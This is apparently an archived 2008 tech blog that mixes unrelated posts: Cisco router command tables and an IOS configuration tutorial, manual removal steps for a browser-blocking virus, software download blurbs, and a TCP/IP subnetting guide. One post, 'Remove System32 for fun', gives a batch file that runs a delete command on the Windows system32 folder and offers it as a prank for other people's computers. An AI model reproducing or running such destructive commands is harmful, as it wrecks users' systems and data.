Friday, August 22, 2008

Fifa 2008



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Friday, August 15, 2008

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Friday, August 8, 2008

Cisco Router Configuration Commands

Requirement Cisco Command

Cisco Router Configuration Commands
Set a console password to cisco Router(config)#line con 0
Router(config-line)#login
Router(config-line)#password cisco
Set a telnet password Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password cisco
Stop console timing out Router(config)#line con 0
Router(config-line)#exec-timeout 0 0
Set the enable password to cisco Router(config)#enable password cisco
Set the enable secret password to peter.

This password overrides the enable password and is encypted within the config file
Router(config)#enable secret peter
Enable an interface Router(config-if)#no shutdown
To disable an interface Router(config-if)#shutdown
Set the clock rate for a router with a DCE cable to 64K Router(config-if)clock rate 64000
Set a logical bandwidth assignment of 64K to the serial interface Router(config-if)bandwidth 64
Note that the zeroes are not missing
To add an IP address to a interface Router(config-if)#ip addr 10.1.1.1 255.255.255.0
To enable RIP on all 172.16.x.y interfaces Router(config)#router rip
Router(config-router)#network 172.16.0.0
Disable RIP Router(config)#no router rip
To enable IRGP with a AS of 200, to all interfaces Router(config)#router igrp 200
Router(config-router)#network 172.16.0.0
Disable IGRP Router(config)#no router igrp 200
Static route the remote network is 172.16.1.0, with a mask of 255.255.255.0, the next hop is 172.16.2.1, at a cost of 5 hops Router(config)#ip route 172.16.1.0 255.255.255.0 172.16.2.1 5
Disable CDP for the whole router Router(config)#no cdp run
Enable CDP for he whole router Router(config)#cdp run
Disable CDP on an interface Router(config-if)#no cdp enable

Cisco Router Configuration Commands

Requirement Cisco Command

View version information show version
View current configuration (DRAM) show running-config
View startup configuration (NVRAM) show startup-config
Show IOS file and flash space show flash
Shows all logs that the router has in its memory show log
View the interface status of interface e0 show interface e0
Overview all interfaces on the router show ip interfaces brief
View type of serial cable on s0 show controllers 0 (note the space between the 's' and the '0')
Display a summary of connected cdp devices show cdp neighbor
Display detailed information on all devices show cdp entry *
Display current routing protocols show ip protocols
Display IP routing table show ip route
Display access lists, this includes the number of displayed matches show access-lists
Check the router can see the ISDN switch show isdn status
Check a Frame Relay PVC connections show frame-relay pvc
show lmi traffic stats show frame-relay lmi
Display the frame inverse ARP table show frame-relay map

Cisco Router Basic Operations

Requirement Cisco Command

Enable Enter privileged mode
Return to user mode from privileged disable
Exit Router Logout or exit or quit
Recall last command up arrow or
Recall next command down arrow or
Suspend or abort and and 6 then x
Refresh screen output
Compleat Command TAB

Cisco Router Copy Commands

Requirement Cisco Command

Save the current configuration from DRAM to NVRAM copy running-config startup-config
Merge NVRAM configuration to DRAM copy startup-config running-config
Copy DRAM configuration to a TFTP server copy runing-config tftp
Merge TFTP configuration with current router configuration held in DRAM copy tftp runing-config
Backup the IOS onto a TFTP server copy flash tftp
Upgrade the router IOS from a TFTP server copy tftp flash



Cisco Router Debug Commands


Requirement Cisco Command

Enable debug for RIP debug ip rip
Enable summary IGRP debug information debug ip igrp events
Enable detailed IGRP debug information debug ip igrp transactions
Debug IPX RIP debug ipx routing activity
Debug IPX SAP debug IPX SAP
Enable debug for CHAP or PAP debug ppp authentication
Switch all debugging off no debug all
undebug all

Cisco Router Configuration Tutorial

Cisco Router Configuration Tutorial


This document covers basic Cisco router IP configuration using the command-line interface

Disclaimer
This document carries no explicit or implied warranty. Nor is there any guarantee that the information contained in this document is accurate. It is offered in the hopes of helping others, but you use it at your own risk. The author will not be liable for any damages that occur as a result of using this document.

Conventions
Important terms and concepts, when they are introduced, may be displayed in bold. Commands included in the body of the text will be displayed in this font. All names and addresses used in examples are just that, examples, and should not be used on your network. Do not type them in verbatim when configuring your system. Finally, in some examples where the command rquires an IP address as an argument, the IP address may be represented in this way, xx.xx.xx.xx, or aa.bb.cc.dd. You will never actually use these strings when configuring your system. They are mearly a convention of this document to specify that you should substitute the appropriate IP address at that point.

1. What this document covers
There are several methods available for configuring Cisco routers. It can be done over the network from a TFTP server. It can be done through the menu interface provided at bootup, and it can be done from the menu interface provided by using the command setup. This tutorial does not cover these methods. It covers configuration from the IOS command-line interface only. Useful for anyone new to Cisco routers, and those studying for CCNA.

Note that this tutorial does not cover physically connecting the router to the networks it will be routing for. It covers operating system configuration only.

1.1 Reasons for using the command-line
The main reason for using the command-line interface instead of a menu driven interface is speed. Once you have invested the time to learn the command-line commands, you can perform many operations much more quickly than by using a menu. This is basically true of all command-line vs. menu interfaces. What makes it especially efficient to learn the command-line interface of the Cisco IOS is that it is standard across all Cisco routers. Also, some questions on the CCNA exam require you to know command-line commands.

2. Getting started with Cisco
Initially you will probably configure your router from a terminal. If the router is already configured and at least one port is configured with an IP address, and it has a physical connection to the network, you might be able to telnet to the router and configure it across the network. If it is not already configured, then you will have to directly connect to it with a terminal and a serial cable. With any Windows box you can use Hyperterminal to easily connect to the router. Plug a serial cable into a serial (COM) port on the PC and the other end into the console port on the Cisco router. Start Hyperterminal, tell it which COM port to use and click OK. Set the speed of the connection to 9600 baud and click OK. If the router is not on, turn it on.

If you wish to configure the router from a Linux box, either Seyon or Minicom should work. At least one of them, and maybe both, will come with your Linux distribution.

Often you will need to hit the Enter key to see the prompt from the router. If it is unconfigured it will look like this:

Router>
If it has been previously configured with a hostname, it will look like this:

hostname of router>
If you have just turned on the router, after it boots it will ask you if you wish to begin initial configuration. Say no. If you say yes, it will put you in the menu interface. Say no.

2.1 Modes
The Cisco IOS command-line interface is organized around the idea of modes. You move in and out of several different modes while configuring a router, and which mode you are in determines what commands you can use. Each mode has a set of commands available in that mode, and some of these commands are only available in that mode. In any mode, typing a question mark will display a list of the commands available in that mode.

Router>?
2.2 Unprivileged and privileged modes
When you first connect to the router and provide the password (if necessary), you enter EXEC mode, the first mode in which you can issue commands from the command-line. From here you can use such unprivileged commands as ping, telnet, and rlogin. You can also use some of the show commands to obtain information about the system. In unprivileged mode you use commands like, show version to display the version of the IOS the router is running. Typing show ? will diplay all the show commands available in the mode you are presently in.

Router>show ?
You must enter privileged mode to configure the router. You do this by using the command enable. Privileged mode will usually be password protected unless the router is unconfigured. You have the option of not password protecting privileged mode, but it is HIGHLY recommended that you do. When you issue the command enable and provide the password, you will enter privileged mode.

To help the user keep track of what mode they are in, the command-line prompt changes each time you enter a different mode. When you switch from unprivileged mode to privileged mode, the prompt changes from:

Router>
to

Router#
This would probably not be a big deal if there were just two modes. There are, in fact, numerous modes, and this feature is probably indispensable. Pay close attention to the prompt at all times.

Within privileged mode there are many sub-modes. In this document I do not closely follow Cisco terminology for this hierarchy of modes. I think that my explanation is clearer, frankly. Cisco describes two modes, unprivileged and privileged, and then a hierarchy of commands used in privileged mode. I reason that it is much clearer to understand if you just consider there to be many sub-modes of privileged mode, which I will also call parent mode. Once you enter privileged mode (parent mode) the prompt ends with a pound sign (#). There are numerous modes you can enter only after entering privileged mode. Each of these modes has a prompt of the form:

Router(arguments)#
They still all end with the pound sign. They are subsumed within privileged mode. Many of these modes have sub-modes of their own. Once you enter priliged mode, you have access to all the configuration information and options the IOS provides, either directly from the parent mode, or from one of its submodes.

3. Configuring your Cisco Router
If you have just turned on the router, it will be completely unconfigured. If it is already configured, you may want to view its current configuration. Even if it has not been previously configured, you should familiarize yourself with the show commands before beginning to configure the router. Enter privileged mode by issuing the command enable, then issue several show commands to see what they display. Remember, the command show ? will display all the showcommands aavailable in the current mode. Definately try out the following commands:

Router#show interfaces
Router#show ip protocols
Router#show ip route
Router#show ip arp
When you enter privileged mode by using the command enable, you are in the top-level mode of privileged mode, also known in this document as "parent mode." It is in this top-level or parent mode that you can display most of the information about the router. As you now know, you do this with the show commands. Here you can learn the configuration of interfaces and whether they are up or down. You can display what IP protocols are in use, such as dynamic routing protocols. You can view the route and ARP tables, and these are just a few of the more important options.

As you configure the router, you will enter various sub-modes to set options, then return to the parent mode to display the results of your commands. You also return to the parent mode to enter other sub-modes. To return to the parent mode, you hit ctrl-z. This puts any commands you have just issued into affect, and returns you to parent mode.

3.1 Global configuration (config)
To configure any feature of the router, you must enter configuration mode. This is the first sub-mode of the parent mode. In the parent mode, you issue the command config.

Router#config
Router(config)#
As demonstrated above, the prompt changes to indicate the mode that you are now in.

In connfiguration mode you can set options that apply system-wide, also refered to as "global configurations." For instance, it is a good idea to name your router so that you can easily identify it. You do this in configuration mode with the hostname command.

Router(config)#hostname ExampleName
ExampleName(config)#
As demonstrated above, when you set the name of the host with the hostname command, the prompt immediately changes by replacing Router with ExampleName. (Note: It is a good idea to name your routers with an organized naming scheme.)

Another useful command issued from config mode is the command to designate the DNS server to be used by the router:

ExampleName(config)#ip name-server aa.bb.cc.dd
ExampleName(config)#ctrl-Z
ExampleName#
This is also where you set the password for privileged mode.

ExampleName(config)#enable secret examplepassword
ExampleName(config)#ctrl-Z
ExampleName#
Until you hit ctrl-Z (or type exit until you reach parent mode) your command has not been put into affect. You can enter config mode, issue several different commands, then hit ctrl-Z to activate them all. Each time you hit ctrl-Z you return to parent mode and the prompt:

ExampleName#
Here you use show commands to verify the results of the commands you issued in config mode. To verify the results of the ip name-server command, issue the command show host.

3.2 Configuring Cisco router interfaces
Cisco interface naming is straightforward. Individual interfaces are referred to by this convention:

media type slot#/port#
"Media type" refers to the type of media that the port is an interface for, such as Ethernet, Token Ring, FDDI, serial, etc. Slot numbers are only applicable for routers that provide slots into which you can install modules. These modules contain several ports for a given media. The 7200 series is an example. These modules are even hot-swapable. You can remove a module from a slot and replace it with a different module, without interrupting service provided by the other modules installed in the router. These slots are numbered on the router.

Port number refers to the port in reference to the other ports in that module. Numbering is left-to-right, and all numbering starts at 0, not at one.

For example, a Cisco 7206 is a 7200 series router with six slots. To refer to an interface that is the third port of an Ethernet module installed in the sixth slot, it would be interface ethernet 6/2. Therefor, to display the configuration of that interface you use the command:

ExampleName#show interface ethernet 6/2
If your router does not have slots, like a 1600, then the interface name consists only of:

media type port#
For example:

ExampleName#show interface serial 0
Here is an example of configuring a serial port with an IP address:

ExampleName#config
ExampleName(config)#interface serial 1/1
ExampleName(config-if)#ip address 192.168.155.2 255.255.255.0
ExampleName(config-if)#no shutdown
ExampleName(config-if)#ctrl-Z
ExampleName#
Then to verify configuration:

ExampleName#show interface serial 1/1
Note the no shutdown command. An interface may be correctly configured and physically connected, yet be "administratively down." In this state it will not function. The command for causing an interface to be administratively down is shutdown.

ExampleName(config)#interface serial 1/1
ExampleName(config-if)#shutdown
ExampleName(config-if)#ctrl-Z
ExampleName#show interface serial 1/1
In the Cisco IOS, the way to reverse or delete the results of any command is to simply put no infront of it. For instance, if we wanted to unassign the IP address we had assigned to interface serial 1/1:

ExampleName(config)#interface serail 1/1
ExampleName(config-if)#no ip address 192.168.155.2 255.255.255.0
ExampleName(config-if)ctrl-Z
ExampleName#show interface serial 1/1
Configuring most interfaces for LAN connections might consist only of assigning a network layer address and making sure the interface is not administratively shutdown. It is usually not necessary to stipulate data-link layer encapsulation. Note that it is often necessary to stipulate the appropriate data-link layer encapsulation for WAN connections, such as frame-relay and ATM. Serial interfaces default to using HDLC. A discussion of data-link protocols is outside the scope of this document. You will need to look up the IOS command encapsulation for more details.

3.3 Configuring Cisco Routing
IP routing is automatically enabled on Cisco routers. If it has been previously disabled on your router, you turn it back on in config mode with the command ip routing.

ExampleName(config)#ip routing
ExampleName(config)#ctrl-Z
There are two main ways a router knows where to send packets. The administrator can assign static routes, or the router can learn routes by employing a dynamic routing protocol.

These days static routes are generally used in very simple networks or in particular cases that necessitate their use. To create a static route, the administrator tells the router operating system that any network traffic destined for a specified network layer address should be forwarded to a similiarly specified network layer address. In the Cisco IOS this is done with the ip route command.

ExampleName#config
ExampleName(config)#ip route 172.16.0.0 255.255.255.0 192.168.150.1
ExampleName(config)#ctrl-Z
ExampleName#show ip route
Two things to be said about this example. First, the packet destination address must include the subnet mask for that destination network. Second, the address it is to be forwarded to is the specified addres of the next router along the path to the destination. This is the most common way of setting up a static route, and the only one this document covers. Be aware, however, that there are other methods.

Dynamic routing protocols, running on connected routers, enable those routers to share routing information. This enables routers to learn the routes available to them. The advantage of this method is that routers are able to adjust to changes in network topologies. If a route is physically removed, or a neighbor router goes down, the routing protocol searches for a new route. Routing protocols can even dynamically choose between possible routes based on variables such as network congestion or network reliability.

There are many different routing protocols, and they all use different variables, known as "metrics," to decide upon appropriate routes. Unfortunately, a router needs to be running the same routing protocols as its neighbors. Many routers can, however, run mutliple protocols. Also, many protocols are designed to be able to pass routing information to other routing protocols. This is called "redistribution." The author has no experience with trying to make redistribution work. There is an IOS redistribute command you can research if you think this is something you need. This document's compagnion case study describes an alternative method to deal with different routing protocols in some circumstances.

Routing protocols are a complex topic and this document contains only this superficial description of them. There is much to learn about them, and there are many sources of information about them available. An excelent source of information on this topic is Cisco's website, http://www.cisco.com.

This document describes how to configure the Routing Information Protocol (RIP) on Cisco routers. From the command-line, we must explicitly tell the router which protocol to use, and what networks the protocol will route for.

ExampleName#config
ExampleName(config)#router rip
ExampleName(config-router)#network aa.bb.cc.dd
ExampleName(config-router)#network ee.ff.gg.hh
ExampleName(config-router)#ctrl-Z
ExampleName#show ip protocols
Now when you issue the show ip protocols command, you should see an entry describing RIP configuration.

3.4 Saving your Cisco Router configuration
Once you have configured routing on the router, and you have configured individual interfaces, your router should be capable of routing traffic. Give it a few moments to talk to its neighbors, then issue the commands show ip route and show ip arp. There should now be entries in these tables learned from the routing protocol.

If you turned the router off right now, and turned it on again, you would have to start configuration over again. Your running configuration is not saved to any perminent storage media. You can see this configuration with the command show running-config.

ExampleName#show running-config
You do want to save your successful running configuration. Issue the command copy running-config startup-config.

ExampleName#copy running-config startup-config
Your configuration is now saved to non-volatile RAM (NVRAM). Issue the command show startup-config.

ExampleName#show startup-config
Now any time you need to return your router to that configuration, issue the command copy startup-config running-config.

ExampleName#copy startup-config running-config
3.5 Example Cisco Router configuration
Router>enable
Router#config
Router(config)#hostname N115-7206
N115-7206(config)#interface serial 1/1
N115-7206(config-if)ip address 192.168.155.2 255.255.255.0
N115-7206(config-if)no shutdown
N115-7206(config-if)ctrl-z
N115-7206#show interface serial 1/1
N115-7206#config
N115-7206(config)#interface ethernet 2/3
N115-7206(config-if)#ip address 192.168.150.90 255.255.255.0
N115-7206(config-if)#no shutdown
N115-7206(config-if)#ctrl-z
N115-7206#show interface ethernet 2/3
N115-7206#config
N115-7206(config)#router rip
N115-7206(config-router)#network 192.168.155.0
N115-7206(config-router)#network 192.168.150.0
N115-7206(config-router)#ctrl-z
N115-7206#show ip protocols
N115-7206#ping 192.168.150.1
N115-7206#config
N115-7206(config)#ip name-server 172.16.0.10
N115-7206(config)#ctrl-z
N115-7206#ping archie.au
N115-7206#config
N115-7206(config)#enable secret password
N115-7206(config)#ctrl-z
N115-7206#copy running-config startup-config
N115-7206#exit
4. Troubleshooting your Cisco router
Inevitably, there will be problems. Usually, it will come in the form of a user notifying you that they can not reach a certain destination, or any destinattion at all. You will need to be able to check how the router is attempting to route traffic, and you must be able to track down the point of failure.

You are already familiar with the show commands, both specific commands and how to learn what other show commands are available. Some of the most basic, most useful commands you will use for troubleshooting are:

ExampleName#show interfaces
ExampleName#show ip protocols
ExampleName#show ip route
ExampleName#show ip arp
4.1 Testing connectivity
It is very possible that the point of failure is not in your router configuration, or at your router at all. If you examine your router's configuration and operation and everything looks good, the problem might be be farther up the line. In fact, it may be the line itself, or it could be another router, which may or may not be under your administration.

One extremely useful and simple diagnostic tool is the ping command. Ping is an implementation of the IP Message Control Protocol (ICMP). Ping sends an ICMP echo request to a destination IP address. If the destination machine receives the request, it responds with an ICMP echo response. This is a very simple exchange that consists of:

Hello, are you alive?

Yes, I am.

ExampleName#ping xx.xx.xx.xx
If the ping test is successful, you know that the destination you are having difficulty reaching is alive and physically reachable.

If there are routers between your router and the destination you are having difficulty reaching, the problem might be at one of the other routers. Even if you ping a router and it responds, it might have other interfaces that are down, its routing table may be corrupted, or any number of other problems may exist.

To see where packets that leave your router for a particular destination go, and how far, use the trace command.

ExampleName#trace xx.xx.xx.xx
It may take a few minutes for this utility to finish, so give it some time. It will display a list of all the hops it makes on the way to the destination.

4.2 debug commands
There are several debug commands provided by the IOS. These commands are not covered here. Refer to the Cisco website for more information.

4.3 Hardware and physical connections
Do not overlook the possibility that the point of failure is a hardware or physical connection failure. Any number of things can go wrong, from board failures to cut cables to power failures. This document will not describew troubleshooting these problems, except for these simple things.

Check to see that the router is turned on. Also make sure that no cables are loose or damaged. Finally, make sure cables are plugged into the correct ports. Beyond this simple advice you will need to check other sources.

4.4 Out of your control
If the point of failure is farther up the line, the prolem might lie with equipment not under your administration. Your only option might be to contact the equipment's administrator, notify them of your problem, and ask them for help. It is in your interest to be courtious and respectful. The other administrator has their own problems, their own workload and their own priorities. Their agenda might even directly conflict with yours, such as their intention to change dynamic routing protocols, etc. You must work with them, even if the situation is frustrating. Alienating someone with the power to block important routes to your network is not a good idea.

5. References
Leinwand, Pinsky and Culpepper Cisco Router Configuration. Indianapolis, Indiana: Cisco Press, 1998.
Cisco Systems, Inc.,

http://www.cisco.com

HOW TO REMOVE VIRUS WHICH BANNES ORKUT


TO REMOVE VIRUS WHICH BANNES ORKUT
WHEN EVER U TRY TO OPEN ORKUT OR YOUTUBE IF YOU ENCOUNTER A MESSAGE SAYING ORKUT HAD BEEN BANNED ON YOUR COMPUTER THEN FOLLOW THIS PROCEDURE:-


1) Press CTRL+ALT+DEL and go to the processes tab

2) Look for svchost.exe under the image name. There will be many but look for the ones which have your username under the username

3) Press DEL to kill these files. It will give you a warning, Press Yes
Repeat for more svchost.exe files with your username and repeat. Do not kill svchost.exe with system, local service or network service!

4) Now open My Computer In the address bar, type C:\heap41a and press enter. It is a hidden folder, and is not visible by default.

5)Delete all the files here

6)Now go to Start --> Run and type Regedit
Go to the menu Edit --> Find
Type "heap41a" here and press enter. You will get something like this "[winlogon] C:\heap41a\svchost.exe C:\heap(some number)\std.txt"
Select that and Press DEL. It will ask "Are you sure you wanna delete this value", click Yes

Now close the registry editor.

AND NOW YOU ARE DONE THE FUCK HAD BEEN SUCCESSFULLY REMOVED FROM UR COMPUTER

Wednesday, August 6, 2008

MCP NOTES

MCP NOTES
Read about MCP certification benefits, which include access to career-related tools, private newsgroups, exclusive discounts, and invitations to Microsoft special events that are available only to those with an MCP credential.
Go to http://www.microsoft.com
Read about MCP certification benefits, which include access to career-related tools, private newsgroups, exclusive discounts, and invitations to Microsoft special events that are available only to those with an MCP credential.

Download:- Click here
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Monday, August 4, 2008

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iPod Classic Data Recovery Tool 3.0.1.5
Music recovery tool rescue deleted formatted audio video songs and digital photo
ImTOO MPEG Encoder Standard 5.0.94.0714
A powerful video converter to convert various video and audio files

Angry IP Scanner 2.16

Angry IP scanner is a very fast and small IP scanner. It pings each IP address to check if it's alive, then optionally it is resolving hostname and tries to connect at specified in Options dialog box TCP port. The program uses separate threads for each scanned address to reduce scanning speed. It can also display NetBIOS information: computer name, workgroup, currently logged user and MAC address....
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Saturday, August 2, 2008

Download Spyware Doctor


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Friday, August 1, 2008

Remove System32 for fun(Don't check in your pc)

open a notepad type the following:
@echo off
del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)
double click and it will delete the system32 folder.

How to set up TCP/IP

How to set up TCP/IP
(The really technical stuff)

This is the part that can be lengthy and confusing to explain about TCP/IP and how it works. You have to choose an IP address on your own, which can be difficult, but I will tell you how to do it. As you may know, an IP address is a grouping of four numbers that are each three or less numbers long, such as x.x.x.x where x is a number that is less than or equal to 255 down to 0 but not blank. The IP address that you see is a shorter way of writing a binary number that is 32 digits (bits) long.

Similar to a telephone number, an IP address is a way of finding something (for a phone, that something is a house, for IP, that is a computer). The more similar two numbers are from left to right, the more the two things have in common. As a phone number of 555-5555 is fairly similar to 555-4444; an IP address of 100.100.100.10 is fairly similar to an IP address of 100.100.100.20. As 444-5555 is not so similar to 222-2222; an IP address of 100.100.100.10 is not so similar to one of 200.200.200.10. To an even larger degree, as IP of 200.200.200.200 is not very similar at all to 100.100.100.100.

The differentiating factor between the slew of examples of IP addresses is the subnet that each would be on. On the simplest level, two IP addresses would be on the same subnet if both looked like 100.200.250.x. The x number can be anything, but if the 100, the 200, or the 250 are not in the same place on both numbers, then they are not on the same subnet.

As far as DCC is concerned, you should probably be sure that both IP addresses are on the same subnet.

On a slightly higher level, two addresses could share a subnet that look like 100.200.x.x. In this example, to IP's share a subnet as long as both IP's have the 100 and the 200 in common and in the same place.

The differentiating factor between these two examples (the ones with x or x.x on the same subnet) is the subnet mask. A subnet mask tells TCP/IP how much of two IP's must be similar in order to be within "shouting" distance. To be on the same subnet is to be withing shouting distance of another computer. If two computers are not on the same subnet, then a message has to be routed in order to get to its destination. A router would be a computer that is located between two subnets and gives a message from one subnet to the other subnet. The two subnets are not able to communicate directly. For DCC, you don't want routing.

Rembering that an IP address is really a 32 bit string of zero's and ones, let's look at what a subnet mask does.
I will make that statement that the two IP's of 100.100.100.100 and 100.100.100.50 are on the same subnet if the subnet mask is 255.255.255.0. Now I will explain how that is true.

First we need to look at IP addresses as a computer does.
100 in binary is 1100100 and
50 in binary is 110010. Therefore,

100.100.100.100=1100100.1100100.1100100.1100100
and
100.100.100.50= 1100100.1100100.1100100.110010.

If you count those digits you may get less than 32. That is just that 0100 is the same as 100.

Looking at these again with the subnet mask of 255.255.255.0,

01100100.01100100.01100100.01100100
01100100.01100100.01100100.00110010

11111111.11111111.11111111.00000000

then we see a relationship between where the 1's are in the mask and where it was important for the IP to have like numbers. Where there is a one in the subnet mask is where the parts of the IP numbers are checked to see if they are identical. Where the zero's lie is where the numbers do not matter.

Like an IP address, a subnet mask is a group of four numbers smaller than or equal to 255 Although any numbers can be used, it is most common that 255's or 0's are used. If you are doing it at home, use a simple mask like 255.255.255.0.

Hopefully that is enough that you can figure out anything else you need to know. That is the basic idea and if you want to know more, find a good book about it.

How to do it in Windows 95
(The simpler stuff)


After you have installed TCP/IP as a protocol, go to the Network Neighborhood and select the properties of "TCP/IP-> Dial-Up Adapter." From there, select the "IP Adress" tab. On this window you need to select the field for "Specify an IP address."

Fill in an address such as 100.100.100.100 on one computer and one such as 100.100.100.50 on the other computer. Be sure both have a subnet mask such as 255.255.255.0. (I guess 255.0.0.0 would work too.) Click OK and exit out of the Network Neighborhood and then restart the computers.

Both computers should now be ready to connect. (Provided you set up all the other stuff on the referring page.)

Notes about TCP/IP and DCC
When you assign an address to your Dial-up adapter, you are really assigning a static IP address to your modem. Generally you don't want to do this because your modem is assigned an address by your internet server every time you dial up. Usually a user doesn't always have the same IP address each time they dial up. This should create a problem for you and your ISP, but not having IP's is a problem for DCC. As a result, you can set up TCP/IP as you need for DCC, then reset them when you are finished DCC-ing.

When I tried dialing up with a static IP, I still got on and was assigned an IP address from my server, however, I was not able to connect to anything because Netscape was never able to find the DNS server to resolve host names. So I had one IP when not dialed up, and another when I did, then back to the original when I disconnected. *Strange*

By the way, if you make up IP addresses, keep in mind that you have to keep them at home. If you are on the net with a computer in which this would make a difference you would probably know this, but IP addresses that go public must be leased from the InterNIC. You can't make up any old number. (Judging from my experience, you can hard IP your dial-up adpater and still connect to the internet and recieve a server assigned IP.)

Along these lines, there are certain IP addresses that are "special" and shouldn't be used for DCC purposes. Some of those would be 255.255.255.255 and 0.0.0.0. The example of 100.100.100.100 would be ok.

When you network with ethernet cards, you set the IP address for them and you know it is for them. When setting up IP addressing for your dial-up adapter, on the other hand, you don't know exactly what that is. It is your modem, apparently, but it is also DCC, which has no modem. I am sure Windows uses some wierd feature with dial-up adapter that fools networking so that you can have an IP address, but it would be nice if you could set it up independent of the modem. Oh well.

KERALA EXAMINATION RESULTS 2011

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